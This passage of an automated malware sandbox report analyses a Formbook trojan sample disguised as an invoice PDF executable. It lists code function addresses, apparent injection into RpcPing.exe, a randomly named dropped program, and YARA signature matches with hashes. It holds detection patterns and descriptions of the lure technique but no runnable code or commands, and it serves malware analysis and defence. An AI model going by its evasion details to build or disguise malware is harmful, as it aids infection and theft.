Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A20C00 3_2_01A20C00
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A9EFA0 3_2_01A9EFA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A12FC8 3_2_01A12FC8
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A62F28 3_2_01A62F28
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A40F30 3_2_01A40F30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AC2F30 3_2_01AC2F30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A94F40 3_2_01A94F40
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A32E90 3_2_01A32E90
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADCE93 3_2_01ADCE93
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADEEDB 3_2_01ADEEDB
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADEE26 3_2_01ADEE26
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A20E59 3_2_01A20E59
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A2B1B0 3_2_01A2B1B0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AEB16B 3_2_01AEB16B
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A5516C 3_2_01A5516C
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A0F172 3_2_01A0F172
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD70E9 3_2_01AD70E9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADF0E0 3_2_01ADF0E0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ACF0CC 3_2_01ACF0CC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A270C0 3_2_01A270C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A6739A 3_2_01A6739A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD132D 3_2_01AD132D
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A0D34C 3_2_01A0D34C
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A252A0 3_2_01A252A0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AC12ED 3_2_01AC12ED
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3D2F0 3_2_01A3D2F0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3B2C0 3_2_01A3B2C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABD5B0 3_2_01ABD5B0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AE95C3 3_2_01AE95C3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD7571 3_2_01AD7571
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADF43F 3_2_01ADF43F
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A11460 3_2_01A11460
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADF7B0 3_2_01ADF7B0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD16CC 3_2_01AD16CC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A65630 3_2_01A65630
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AB5910 3_2_01AB5910
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A29950 3_2_01A29950
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3B950 3_2_01A3B950
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A238E0 3_2_01A238E0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A8D800 3_2_01A8D800
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3FB80 3_2_01A3FB80
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A95BF0 3_2_01A95BF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A5DBF9 3_2_01A5DBF9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADFB76 3_2_01ADFB76
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A65AA0 3_2_01A65AA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABDAAC 3_2_01ABDAAC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AC1AA3 3_2_01AC1AA3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ACDAC6 3_2_01ACDAC6
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A93A6C 3_2_01A93A6C
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADFA49 3_2_01ADFA49
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD7A46 3_2_01AD7A46
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3FDC0 3_2_01A3FDC0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD7D73 3_2_01AD7D73
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A23D40 3_2_01A23D40
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD1D5A 3_2_01AD1D5A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADFCF2 3_2_01ADFCF2
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A99C32 3_2_01A99C32
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADFFB1 3_2_01ADFFB1
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A21F92 3_2_01A21F92
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E3FD5 3_2_019E3FD5
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E3FD2 3_2_019E3FD2
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADFF09 3_2_01ADFF09
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A29EB0 3_2_01A29EB0
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F6C01 7_2_036F6C01
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F8BDE 7_2_036F8BDE
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FF27E 7_2_036FF27E
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FF27B 7_2_036FF27B
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F89BE 7_2_036F89BE
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F89B5 7_2_036F89B5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_0370109E 7_2_0370109E
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_0371752E 7_2_0371752E
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F6DA4 7_2_036F6DA4
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F6C5E 7_2_036F6C5E
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AE03E6 8_2_03AE03E6
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A2E3F0 8_2_03A2E3F0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADA352 8_2_03ADA352
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AA02C0 8_2_03AA02C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AC0274 8_2_03AC0274
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AE01AA 8_2_03AE01AA
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD41A2 8_2_03AD41A2
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD81CC 8_2_03AD81CC
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A10100 8_2_03A10100
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ABA118 8_2_03ABA118
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AA8158 8_2_03AA8158
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AB2000 8_2_03AB2000
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A1C7C0 8_2_03A1C7C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A20770 8_2_03A20770
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A44750 8_2_03A44750
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A3C6E0 8_2_03A3C6E0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AE0591 8_2_03AE0591
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A20535 8_2_03A20535
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ACE4F6 8_2_03ACE4F6
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AC4420 8_2_03AC4420
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD2446 8_2_03AD2446
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD6BD7 8_2_03AD6BD7
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADAB40 8_2_03ADAB40
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A1EA80 8_2_03A1EA80
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A229A0 8_2_03A229A0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AEA9A6 8_2_03AEA9A6
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A36962 8_2_03A36962
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A068B8 8_2_03A068B8
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A4E8F0 8_2_03A4E8F0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A22840 8_2_03A22840
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A2A840 8_2_03A2A840
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A9EFA0 8_2_03A9EFA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A12FC8 8_2_03A12FC8
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A62F28 8_2_03A62F28
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A40F30 8_2_03A40F30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AC2F30 8_2_03AC2F30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A94F40 8_2_03A94F40
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A32E90 8_2_03A32E90
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADCE93 8_2_03ADCE93
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADEEDB 8_2_03ADEEDB
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADEE26 8_2_03ADEE26
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A20E59 8_2_03A20E59
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A38DBF 8_2_03A38DBF
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A1ADE0 8_2_03A1ADE0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A2AD00 8_2_03A2AD00
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ABCD1F 8_2_03ABCD1F
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AC0CB5 8_2_03AC0CB5
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A10CF2 8_2_03A10CF2
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A20C00 8_2_03A20C00
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A6739A 8_2_03A6739A
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD132D 8_2_03AD132D
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A0D34C 8_2_03A0D34C
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A252A0 8_2_03A252A0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AC12ED 8_2_03AC12ED
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A3D2F0 8_2_03A3D2F0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A3B2C0 8_2_03A3B2C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A2B1B0 8_2_03A2B1B0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AEB16B 8_2_03AEB16B
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A5516C 8_2_03A5516C
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A0F172 8_2_03A0F172
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD70E9 8_2_03AD70E9
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADF0E0 8_2_03ADF0E0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ACF0CC 8_2_03ACF0CC
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A270C0 8_2_03A270C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADF7B0 8_2_03ADF7B0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD16CC 8_2_03AD16CC
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A65630 8_2_03A65630
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ABD5B0 8_2_03ABD5B0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AE95C3 8_2_03AE95C3
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD7571 8_2_03AD7571
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADF43F 8_2_03ADF43F
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A11460 8_2_03A11460
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A3FB80 8_2_03A3FB80
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A95BF0 8_2_03A95BF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A5DBF9 8_2_03A5DBF9
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADFB76 8_2_03ADFB76
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A65AA0 8_2_03A65AA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ABDAAC 8_2_03ABDAAC
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AC1AA3 8_2_03AC1AA3
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ACDAC6 8_2_03ACDAC6
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A93A6C 8_2_03A93A6C
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADFA49 8_2_03ADFA49
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD7A46 8_2_03AD7A46
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AB5910 8_2_03AB5910
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A29950 8_2_03A29950
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A3B950 8_2_03A3B950
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A238E0 8_2_03A238E0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A8D800 8_2_03A8D800
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADFFB1 8_2_03ADFFB1
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A21F92 8_2_03A21F92
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_039E3FD5 8_2_039E3FD5
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_039E3FD2 8_2_039E3FD2
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADFF09 8_2_03ADFF09
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A29EB0 8_2_03A29EB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A3FDC0 8_2_03A3FDC0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD7D73 8_2_03AD7D73
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A23D40 8_2_03A23D40
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03AD1D5A 8_2_03AD1D5A
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03ADFCF2 8_2_03ADFCF2
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03A99C32 8_2_03A99C32
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_032717C0 8_2_032717C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326C747 8_2_0326C747
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326C750 8_2_0326C750
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326AB36 8_2_0326AB36
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326C970 8_2_0326C970
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326A9ED 8_2_0326A9ED
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0326A9F0 8_2_0326A9F0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03274E30 8_2_03274E30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0328B2C0 8_2_0328B2C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0327300D 8_2_0327300D
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03273010 8_2_03273010
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3038E 8_2_03D3038E
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3E334 8_2_03D3E334
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3E7EC 8_2_03D3E7EC
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D4552D 8_2_03D4552D
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D454BD 8_2_03D454BD
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3E453 8_2_03D3E453
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3CAE8 8_2_03D3CAE8
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3CA8A 8_2_03D3CA8A
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_03D3D858 8_2_03D3D858
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058CF489 9_2_058CF489
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058D0CD9 9_2_058D0CD9
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058D0CD6 9_2_058D0CD6
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058CA419 9_2_058CA419
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058CA410 9_2_058CA410
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058E8F89 9_2_058E8F89
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058C87FF 9_2_058C87FF
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058C86B9 9_2_058C86B9
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058C86B6 9_2_058C86B6
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058CA639 9_2_058CA639
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 9_2_058D2AF9 9_2_058D2AF9
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: String function: 01A9F290 appears 103 times
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: String function: 01A55130 appears 58 times
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: String function: 01A67E54 appears 107 times
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: String function: 01A0B970 appears 262 times
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: String function: 01A8EA12 appears 86 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 03A8EA12 appears 86 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 03A0B970 appears 262 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 03A67E54 appears 107 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 03A55130 appears 58 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 03A9F290 appears 103 times
Sample file is different than original file name gathered from version info
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000000.1663240818.00000000002DE000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHx.exe2 vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1688616532.00000000008EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693835243.0000000007420000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.0000000001B0D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRpcPing.exej% vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Binary or memory string: OriginalFilenameHx.exe2 vs ORIGINAL INVOICE COAU7230734298.pdf.exe
Uses 32bit PE files
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
